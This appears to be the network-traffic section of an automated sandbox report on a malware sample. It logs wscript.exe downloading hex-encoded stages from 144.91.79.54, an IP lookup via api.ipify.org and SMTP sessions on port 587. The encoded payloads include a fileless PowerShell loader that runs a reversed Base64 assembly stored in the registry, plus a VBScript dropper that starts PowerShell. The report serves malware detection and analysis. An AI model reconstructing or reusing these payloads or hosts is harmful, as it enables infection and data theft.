Jan 14, 2025 08:47:13.031331062 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:13.031362057 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:13.031388044 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:13.512413979 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:15.452419043 CET | 49677 | 443 | 192.168.2.7 | 20.50.201.200
Jan 14, 2025 08:47:17.171221972 CET | 49675 | 443 | 192.168.2.7 | 104.98.116.138
Jan 14, 2025 08:47:17.171308994 CET | 49674 | 443 | 192.168.2.7 | 104.98.116.138
Jan 14, 2025 08:47:17.343193054 CET | 49672 | 443 | 192.168.2.7 | 104.98.116.138
Jan 14, 2025 08:47:19.779995918 CET | 443 | 49698 | 104.98.116.138 | 192.168.2.7
Jan 14, 2025 08:47:19.780116081 CET | 49698 | 443 | 192.168.2.7 | 104.98.116.138
Jan 14, 2025 08:47:20.249316931 CET | 49671 | 443 | 192.168.2.7 | 204.79.197.203
Jan 14, 2025 08:47:21.405627966 CET | 49677 | 443 | 192.168.2.7 | 20.50.201.200
Jan 14, 2025 08:47:33.311860085 CET | 49677 | 443 | 192.168.2.7 | 20.50.201.200
Jan 14, 2025 08:48:15.293291092 CET | 49970 | 443 | 192.168.2.7 | 104.26.12.205
Jan 14, 2025 08:48:15.293318987 CET | 443 | 49970 | 104.26.12.205 | 192.168.2.7
Jan 14, 2025 08:48:15.293407917 CET | 49970 | 443 | 192.168.2.7 | 104.26.12.205
Jan 14, 2025 08:48:15.300683975 CET | 49970 | 443 | 192.168.2.7 | 104.26.12.205
Jan 14, 2025 08:48:15.300704956 CET | 443 | 49970 | 104.26.12.205 | 192.168.2.7
Jan 14, 2025 08:48:15.767409086 CET | 443 | 49970 | 104.26.12.205 | 192.168.2.7
Jan 14, 2025 08:48:15.767576933 CET | 49970 | 443 | 192.168.2.7 | 104.26.12.205
Jan 14, 2025 08:48:15.769650936 CET | 49970 | 443 | 192.168.2.7 | 104.26.12.205
Jan 14, 2025 08:48:15.769661903 CET | 443 | 49970 | 104.26.12.205 | 192.168.2.7
Jan 14, 2025 08:48:15.769865990 CET | 443 | 49970 | 104.26.12.205 | 192.168.2.7
Jan 14, 2025 08:48:15.812055111 CET | 49970 | 443 | 192.168.2.7 | 104.26.12.205
Jan 14, 2025 08:48:15.929480076 CET | 49970 | 443 | 192.168.2.7 | 104.26.12.205
Jan 14, 2025 08:48:15.971335888 CET | 443 | 49970 | 104.26.12.205 | 192.168.2.7
Jan 14, 2025 08:48:16.042311907 CET | 443 | 49970 | 104.26.12.205 | 192.168.2.7
Jan 14, 2025 08:48:16.042371035 CET | 443 | 49970 | 104.26.12.205 | 192.168.2.7
Jan 14, 2025 08:48:16.042505026 CET | 49970 | 443 | 192.168.2.7 | 104.26.12.205
Jan 14, 2025 08:48:16.059478045 CET | 49970 | 443 | 192.168.2.7 | 104.26.12.205
                                    Jan 14, 2025 08:48:18.348301888 CET49972587192.168.2.7162.254.34.31
                                    Jan 14, 2025 08:48:18.353362083 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:18.353478909 CET49972587192.168.2.7162.254.34.31
                                    Jan 14, 2025 08:48:18.935760021 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:18.936139107 CET49972587192.168.2.7162.254.34.31
                                    Jan 14, 2025 08:48:18.940952063 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.097470999 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.098611116 CET49972587192.168.2.7162.254.34.31
                                    Jan 14, 2025 08:48:19.103523970 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.263585091 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.264323950 CET49972587192.168.2.7162.254.34.31
                                    Jan 14, 2025 08:48:19.269181013 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.429223061 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.429466963 CET49972587192.168.2.7162.254.34.31
                                    Jan 14, 2025 08:48:19.434317112 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.590367079 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.592425108 CET49972587192.168.2.7162.254.34.31
                                    Jan 14, 2025 08:48:19.597184896 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.755903959 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.756150007 CET49972587192.168.2.7162.254.34.31
                                    Jan 14, 2025 08:48:19.760973930 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.917481899 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.918194056 CET49972587192.168.2.7162.254.34.31
                                    Jan 14, 2025 08:48:19.918253899 CET49972587192.168.2.7162.254.34.31
                                    Jan 14, 2025 08:48:19.918253899 CET49972587192.168.2.7162.254.34.31
                                    Jan 14, 2025 08:48:19.918253899 CET49972587192.168.2.7162.254.34.31
                                    Jan 14, 2025 08:48:19.923091888 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.923125029 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.923219919 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:19.923269033 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:20.192673922 CET58749972162.254.34.31192.168.2.7
                                    Jan 14, 2025 08:48:20.233962059 CET49972587192.168.2.7162.254.34.31
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Jan 14, 2025 08:47:15.088253021 CET | 52173 | 53 | 192.168.2.7 | 1.1.1.1
                                    Jan 14, 2025 08:48:15.279548883 CET | 65485 | 53 | 192.168.2.7 | 1.1.1.1
                                    Jan 14, 2025 08:48:15.286621094 CET | 53 | 65485 | 1.1.1.1 | 192.168.2.7
                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                    Jan 14, 2025 08:47:15.088253021 CET | 192.168.2.7 | 1.1.1.1 | 0xa05f | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001) | false
                                    Jan 14, 2025 08:48:15.279548883 CET | 192.168.2.7 | 1.1.1.1 | 0x9373 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                    Jan 14, 2025 08:47:13.866285086 CET | 1.1.1.1 | 192.168.2.7 | 0x76d5 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
                                    Jan 14, 2025 08:47:13.866285086 CET | 1.1.1.1 | 192.168.2.7 | 0x76d5 | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
                                    Jan 14, 2025 08:47:15.095026016 CET | 1.1.1.1 | 192.168.2.7 | 0xa05f | No error (0) | time.windows.com | twc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
                                    Jan 14, 2025 08:47:42.071885109 CET | 1.1.1.1 | 192.168.2.7 | 0xa381 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                                    Jan 14, 2025 08:47:42.071885109 CET | 1.1.1.1 | 192.168.2.7 | 0xa381 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                                    Jan 14, 2025 08:48:15.286621094 CET | 1.1.1.1 | 192.168.2.7 | 0x9373 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
                                    Jan 14, 2025 08:48:15.286621094 CET | 1.1.1.1 | 192.168.2.7 | 0x9373 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
                                    Jan 14, 2025 08:48:15.286621094 CET | 1.1.1.1 | 192.168.2.7 | 0x9373 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
                                    • api.ipify.org
                                    • 144.91.79.54
                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    0 | 192.168.2.7 | 49699 | 144.91.79.54 | 80 | 4656 | C:\Windows\System32\wscript.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jan 14, 2025 08:47:09.039079905 CET | 152 | OUT | GET /2412/s HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                    Host: 144.91.79.54
                                    Jan 14, 2025 08:47:09.664688110 CET | 1236 | IN | HTTP/1.1 200 OK
                                    Date: Tue, 14 Jan 2025 07:47:09 GMT
                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                    Last-Modified: Wed, 02 Oct 2024 01:26:13 GMT
                                    ETag: "6ab0-6237452d358f3"
                                    Accept-Ranges: bytes
                                    Content-Length: 27312
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Data Raw: 33 44 33 44 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 [TRUNCATED]
                                    Data Ascii: 3D3D414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414
                                    Jan 14, 2025 08:47:09.664751053 CET | 1236 | IN | Data Raw: 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34
                                    Data Ascii: 141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141
                                    Jan 14, 2025 08:47:09.664792061 CET | 448 | IN | Data Raw: 44 33 39 33 32 36 33 37 36 34 41 33 33 35 39 37 30 33 31 35 37 34 43 37 41 34 36 35 37 36 32 36 43 36 38 33 32 35 39 37 41 37 30 36 41 36 32 37 39 35 36 36 45 34 39 33 39 34 44 36 45 36 32 37 33 33 31 34 37 36 35 36 37 33 38 36 44 35 41 37 35 36
                                    Data Ascii: D393263764A33597031574C7A4657626C6832597A706A6279566E49394D6E627331476567386D5A756C45647A566E6330784449676F51442B3869497742585975343262705258596A6C47627742585135316B49395557626835474969416A4C7734434D75456A4939343262704E6E636C5A4849355258613035
                                    Jan 14, 2025 08:47:09.664828062 CET | 1236 | IN | Data Raw: 33 33 31 34 37 36 35 36 37 36 42 34 38 36 32 36 39 33 31 35 37 35 41 37 41 34 45 35 38 35 39 33 38 36 46 35 31 34 34 34 42 33 30 36 37 35 30 32 46 34 39 37 39 36 33 36 43 36 43 36 45 34 39 33 39 35 35 36 44 36 32 37 36 37 38 35 37 35 39 36 42 33
                                    Data Ascii: 3314765676B48626931575A7A4E5859386F51444B3067502F4979636C6C6E4939556D62767857596B355759304E48496967544C4752565669307A5A756C475A764E6D626C4269497734534D69306A62766C326379566D6467775762343944502F75373741414141414141414141414141456736414177516344
                                    Jan 14, 2025 08:47:09.664864063 CET | 1236 | IN | Data Raw: 37 34 44 34 31 34 31 34 34 34 31 37 39 34 31 34 31 34 44 34 31 34 35 34 34 34 31 37 39 34 31 34 31 34 44 34 31 35 31 34 37 34 31 37 33 34 32 35 31 36 31 34 31 35 35 34 38 34 31 34 33 34 32 34 31 34 31 34 31 35 35 34 37 34 31 37 34 34 32 35 31 35
                                    Data Ascii: 74D414144417941414D414544417941414D4151474173425161415548414342414141554741744251594134454173425159413447417942515A41514841754251534145414153414152414141417741674C414144417541414D41344341784141414141414175427762416B47417A426763415547415742515A
                                    Jan 14, 2025 08:47:09.664901972 CET | 1236 | IN | Data Raw: 31 34 31 37 37 34 31 33 38 34 31 34 31 34 31 34 31 34 32 34 41 34 31 34 31 34 44 34 31 37 41 34 31 34 31 34 31 34 31 34 31 34 31 35 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34
                                    Data Ascii: 14177413841414141424A41414D417A41414141414151414141414141414141414141414141414141414167414141614141414142415141414141414141414141414141414141414141414141414167414141414141514141414141414141414141414141414141414141674141414F41414141424151414141
                                    Jan 14, 2025 08:47:09.664938927 CET | 1236 | IN | Data Raw: 31 34 31 34 31 34 31 34 31 37 34 35 31 35 32 35 35 35 31 35 31 35 32 35 35 35 31 35 31 34 32 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 33 35 31 35 38 35 41 35 34 35 36 33 32 35 39 37 39 35 36 33 33 36
                                    Data Ascii: 141414141745152555151525551514241414141414141414141414141414351585A54563259795633627A566D556C31576130355764533579636C4E6D63313932636C4A6C4C745647647A6C33556A6B444F7755474E7A6B544D32557A593145324E3349575075563261765256656C74305970786D5931424649
                                    Jan 14, 2025 08:47:09.664973974 CET | 1236 | IN | Data Raw: 45 37 34 34 35 34 31 34 32 36 42 34 36 34 31 34 31 34 31 36 41 34 43 37 37 33 34 34 33 34 44 37 35 36 33 35 34 34 44 34 39 34 39 35 38 35 41 36 42 37 38 35 37 36 31 33 31 34 41 35 35 35 41 36 41 34 41 35 38 36 34 37 36 34 45 35 38 35 41 35 33 35
                                    Data Ascii: E744541426B464141416A4C7734434D7563544D4949585A6B785761314A555A6A4A5864764E585A5352575A776C48563578325A75396D63304E6C4C7A78326276526C4C7A563259795633627A566D557530575A304E5865544E44414245454141416A4C7734434D7545544D4955476468784763745647563531
                                    Jan 14, 2025 08:47:09.665009975 CET | 552 | IN | Data Raw: 46 34 35 34 37 35 31 35 31 36 36 35 33 35 39 37 37 34 31 36 42 34 39 35 32 34 31 36 46 34 39 35 32 34 36 34 37 36 33 35 31 35 39 35 33 34 35 34 31 34 42 35 33 35 35 36 38 34 32 34 38 36 37 36 37 34 35 34 32 36 37 36 39 34 35 35 36 35 39 37 37 34
                                    Data Ascii: F4547515166535977416B4952416F495246476351595345414B535568424867674542676945565977424D4952416F4952464763674F4B5564452F393150776951696754544757786C6533694141544567434541774543417745474D41415445414B535568424341774543635142413452414B51414165415141
                                    Jan 14, 2025 08:47:09.665049076 CET | 1236 | IN | Data Raw: 31 34 31 36 37 34 44 35 31 36 41 34 31 34 42 35 32 34 31 34 32 34 31 36 37 34 32 34 46 37 37 35 32 34 31 36 37 35 31 36 37 34 31 34 46 36 42 34 39 36 37 35 33 34 39 34 31 34 39 34 38 33 34 36 37 34 34 34 46 34 39 34 31 34 31 34 36 36 42 34 39 36
                                    Data Ascii: 141674D516A414B5241424167424F775241675167414F6B496753494149483467444F494141466B4967535941424330496753495169414B4248466377434934514243415142496767444341534249414149446741434630524264517742496768454263414264436F4564436F454241414342436F4542635142
                                    Jan 14, 2025 08:47:09.670001984 CET | 1236 | IN | Data Raw: 33 34 32 37 37 35 39 34 31 34 31 34 33 34 31 36 38 34 32 34 31 35 34 35 36 34 32 34 31 34 31 36 33 34 32 35 31 35 41 34 31 34 39 34 38 34 31 36 38 34 32 37 37 36 34 34 31 35 31 34 38 34 31 36 44 34 32 37 37 36 32 34 31 34 44 33 31 34 35 34 31 34
                                    Data Ascii: 34277594141434168424154564241416342515A4149484168427764415148416D427762414D314541417763415547416A4267634155484176427763415547415342674C4149324641415165304A585A77396D63514E335A756C47643056325535314541354A48647A6C325A6C4A464135786D59745632637A46
                                    Jan 14, 2025 08:47:09.884834051 CET | 152 | OUT | GET /2412/v HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                    Host: 144.91.79.54
                                    Jan 14, 2025 08:47:10.070270061 CET | 761 | IN | HTTP/1.1 200 OK
                                    Date: Tue, 14 Jan 2025 07:47:09 GMT
                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                    Last-Modified: Wed, 25 Sep 2024 15:44:42 GMT
                                    ETag: "1de-622f3802a248c"
                                    Accept-Ranges: bytes
                                    Content-Length: 478
                                    Keep-Alive: timeout=5, max=99
                                    Connection: Keep-Alive
                                    Data Raw: 37 42 35 42 37 44 34 31 37 30 37 30 34 34 36 46 36 44 36 31 36 39 36 45 37 42 35 44 37 44 33 41 33 41 34 33 37 35 37 32 37 32 36 35 36 45 37 34 34 34 36 46 36 44 36 31 36 39 36 45 32 45 34 43 36 46 36 31 36 34 37 42 32 38 37 44 35 42 34 33 36 46 36 45 37 36 36 35 37 32 37 34 37 42 35 44 37 44 33 41 33 41 34 36 37 32 36 46 36 44 34 32 36 31 37 33 36 35 33 36 33 34 35 33 37 34 37 32 36 39 36 45 36 37 37 42 32 38 37 44 37 42 32 38 37 44 32 44 36 41 36 46 36 39 36 45 32 30 37 42 32 38 37 44 34 37 36 35 37 34 32 44 34 39 37 34 36 35 36 44 35 30 37 32 36 46 37 30 36 35 37 32 37 34 37 39 32 30 32 44 34 43 36 39 37 34 36 35 37 32 36 31 36 43 35 30 36 31 37 34 36 38 32 30 32 37 34 38 34 42 34 33 35 35 33 41 35 43 35 33 36 46 36 36 37 34 37 37 36 31 37 32 36 35 35 43 37 43 37 30 36 31 37 34 36 38 37 43 32 37 32 30 32 44 34 45 36 31 36 44 36 35 32 30 32 37 37 33 32 37 37 42 32 39 37 44 32 45 37 33 32 30 37 43 32 30 34 36 36 46 37 32 34 35 36 31 36 33 36 38 32 44 34 46 36 32 36 41 36 35 36 33 37 34 32 30 37 42 [TRUNCATED]
                                    Data Ascii: 7B5B7D417070446F6D61696E7B5D7D3A3A43757272656E74446F6D61696E2E4C6F61647B287D5B436F6E766572747B5D7D3A3A46726F6D426173653634537472696E677B287D7B287D2D6A6F696E207B287D4765742D4974656D50726F7065727479202D4C69746572616C506174682027484B43553A5C536F6674776172655C7C706174687C27202D4E616D65202773277B297D2E73207C20466F72456163682D4F626A656374207B7B7D245F7B5B7D2D312E2E2D7B287D245F2E4C656E6774687B297D7B5D7D7B7D7D7B297D7B297D7B297D3B207B5B7D622E627B5D7D3A3A627B287D277C706174687C277B297D
                                    Jan 14, 2025 08:47:10.080144882 CET | 152 | OUT | GET /2412/r HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                    Host: 144.91.79.54
                                    Jan 14, 2025 08:47:10.265604019 CET | 1236 | IN | HTTP/1.1 200 OK
                                    Date: Tue, 14 Jan 2025 07:47:10 GMT
                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                    Last-Modified: Wed, 09 Oct 2024 05:50:42 GMT
                                    ETag: "9800-62404d5968a93"
                                    Accept-Ranges: bytes
                                    Content-Length: 38912
                                    Keep-Alive: timeout=5, max=98
                                    Connection: Keep-Alive
                                    Data Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 [TRUNCATED]
                                    Data Ascii: 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                    Jan 14, 2025 08:47:11.210165977 CET | 153 | OUT | GET /2412/cn HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                    Host: 144.91.79.54
                                    Jan 14, 2025 08:47:11.395622969 CET | 347 | IN | HTTP/1.1 200 OK
                                    Date: Tue, 14 Jan 2025 07:47:11 GMT
                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                    Last-Modified: Sat, 09 Nov 2024 16:14:35 GMT
                                    ETag: "42-6267d29e174cb"
                                    Accept-Ranges: bytes
                                    Content-Length: 66
                                    Keep-Alive: timeout=5, max=97
                                    Connection: Keep-Alive
                                    Data Raw: 35 33 37 34 36 46 37 30 32 44 35 30 37 32 36 46 36 33 36 35 37 33 37 33 32 30 32 44 34 45 36 31 36 44 36 35 32 30 36 33 36 46 36 45 36 38 36 46 37 33 37 34 32 30 32 44 34 36 36 46 37 32 36 33 36 35
                                    Data Ascii: 53746F702D50726F63657373202D4E616D6520636F6E686F7374202D466F726365


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    1 | 192.168.2.7 | 49700 | 144.91.79.54 | 80 | 4656 | C:\Windows\System32\wscript.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jan 14, 2025 08:47:11.642347097 CET | 155 | OUT | GET /2412/file HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                    Host: 144.91.79.54
                                    Jan 14, 2025 08:47:12.269232035 CET | 1236 | IN | HTTP/1.1 200 OK
                                    Date: Tue, 14 Jan 2025 07:47:12 GMT
                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                    Last-Modified: Fri, 10 Jan 2025 19:46:38 GMT
                                    ETag: "165a-62b5f5a682598"
                                    Accept-Ranges: bytes
                                    Content-Length: 5722
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Data Raw: 34 46 37 30 37 34 36 39 36 46 36 45 32 30 34 35 37 38 37 30 36 43 36 39 36 33 36 39 37 34 30 41 30 41 32 37 32 30 34 45 36 46 36 44 36 32 37 32 36 35 32 30 36 34 37 35 32 30 37 30 37 32 36 46 36 41 36 35 37 34 33 41 32 30 37 43 37 30 36 31 37 34 36 38 37 43 30 41 32 37 32 30 35 36 36 31 37 32 36 39 36 31 36 32 36 43 36 35 37 33 32 30 36 37 36 43 36 46 36 32 36 31 36 43 36 35 37 33 30 41 34 34 36 39 36 44 32 30 35 33 36 38 36 35 36 43 36 43 34 46 36 32 36 41 36 35 37 34 32 43 32 30 34 34 36 46 37 33 37 33 36 39 36 35 37 32 35 37 36 39 36 45 36 34 36 46 37 37 37 33 32 43 32 30 34 33 36 46 36 44 37 30 37 34 36 35 37 35 37 32 34 39 37 34 36 35 37 32 36 31 37 34 36 39 36 46 36 45 37 33 30 41 35 33 36 35 37 34 32 30 35 33 36 38 36 35 36 43 36 43 34 46 36 32 36 41 36 35 37 34 32 30 33 44 32 30 34 33 37 32 36 35 36 31 37 34 36 35 34 46 36 32 36 41 36 35 36 33 37 34 32 38 32 32 35 37 35 33 36 33 37 32 36 39 37 30 37 34 32 45 35 33 36 38 36 35 36 43 36 43 32 32 32 39 30 41 34 34 36 46 37 33 37 33 36 39 36 35 [TRUNCATED]
                                    Data Ascii: [TRUNCATED]
                                    Jan 14, 2025 08:47:12.269288063 CET | 1236 | IN | Data Raw: 36 39 36 45 36 33 36 39 37 30 36 31 36 43 36 35 32 38 32 39 30 41 32 30 32 30 32 30 32 30 34 34 36 46 32 30 35 37 36 38 36 39 36 43 36 35 32 30 34 33 36 46 36 44 37 30 37 34 36 35 37 35 37 32 34 39 37 34 36 35 37 32 36 31 37 34 36 39 36 46 36 45
                                    Data Ascii: 696E636970616C6528290A20202020446F205768696C6520436F6D7074657572497465726174696F6E73203C2031303030302027204C696D697465206427697465726174696F6E7320706F75722064656D6F6E7374726174696F6E0A202020202020202043616C6C205665726966696572457444656D6172726
                                    Jan 14, 2025 08:47:12.269324064 CET | 448 | IN | Data Raw: 32 30 35 33 37 35 36 32 30 41 30 39 30 39 34 35 36 45 36 34 32 30 34 39 36 36 30 41 30 39 30 39 30 41 30 39 30 39 30 41 30 39 30 39 34 33 36 31 36 43 36 43 32 30 34 34 36 35 36 44 36 31 37 32 37 32 36 35 37 32 35 30 36 46 37 37 36 35 37 32 35 33
                                    Data Ascii: 205375620A0909456E642049660A09090A09090A090943616C6C2044656D6172726572506F7765725368656C6C28290A20202020202020200A202020202020202044696D2050726F63657373506F7765725368656C6C0A20202020202020205365742050726F63657373506F7765725368656C6C203D2054726
                                    Jan 14, 2025 08:47:12.269359112 CET | 1236 | IN | Data Raw: 36 33 37 35 37 34 36 35 37 32 34 33 36 46 36 44 36 44 36 31 36 45 36 34 36 35 37 33 35 30 36 46 37 37 36 35 37 32 35 33 36 38 36 35 36 43 36 43 32 38 35 30 37 32 36 46 36 33 36 35 37 33 37 33 35 30 36 46 37 37 36 35 37 32 35 33 36 38 36 35 36 43
                                    Data Ascii: 6375746572436F6D6D616E646573506F7765725368656C6C2850726F63657373506F7765725368656C6C290A2020202020202020456E642049660A09090A09090A20202020456E642049660A456E64205375620A0A2720466F6E6374696F6E20706F757220766572696669657220736920756E2070726F63657
                                    Jan 14, 2025 08:47:12.269395113 CET | 1236 | IN | Data Raw: 34 36 36 46 36 45 36 33 37 34 36 39 36 46 36 45 32 30 37 30 36 46 37 35 37 32 32 30 37 34 37 32 36 46 37 35 37 36 36 35 37 32 32 30 37 35 36 45 32 30 37 30 37 32 36 46 36 33 36 35 37 33 37 33 37 35 37 33 32 30 35 30 36 46 37 37 36 35 37 32 35 33
                                    Data Ascii: 466F6E6374696F6E20706F75722074726F7576657220756E2070726F63657373757320506F7765725368656C6C20656E20636F757273206427657865637574696F6E0A46756E6374696F6E2054726F7576657250726F63657373506F7765725368656C6C28290A2020202044696D204C6973746550726F63657
                                    Jan 14, 2025 08:47:12.269433022 CET | 616 | IN | Data Raw: 36 43 32 39 30 41 32 30 32 30 32 30 32 30 35 37 36 39 37 34 36 38 32 30 35 33 36 38 36 35 36 43 36 43 34 46 36 32 36 41 36 35 37 34 30 41 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 30 32 45 34 31 37 30 37 30 34 31 36 33 37 34 36 39 37 36 36 31
